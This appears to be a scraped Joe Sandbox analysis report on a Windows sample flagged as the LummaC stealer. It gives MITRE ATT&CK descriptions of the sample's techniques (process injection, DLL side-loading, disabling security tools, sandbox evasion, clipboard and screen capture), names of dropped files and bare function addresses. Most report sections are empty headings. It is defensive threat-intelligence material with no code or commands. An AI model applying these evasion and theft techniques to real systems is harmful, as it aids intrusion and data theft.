
Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report E205fJJS1Q.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\E205fJJS1Q.exe.log

C:\Users\user\AppData\Local\Temp\LummaC2.exe

C:\Users\user\AppData\Local\Temp\Set-up.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
E205fJJS1Q.exe

Function 00F15135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Function 00EE8720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Function 00F1BAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 00F1C59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Function 00F1EEC0 Relevance: .1, Instructions: 141
COMMON

Function 00F1BC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 00F1A080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Function 00F1483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre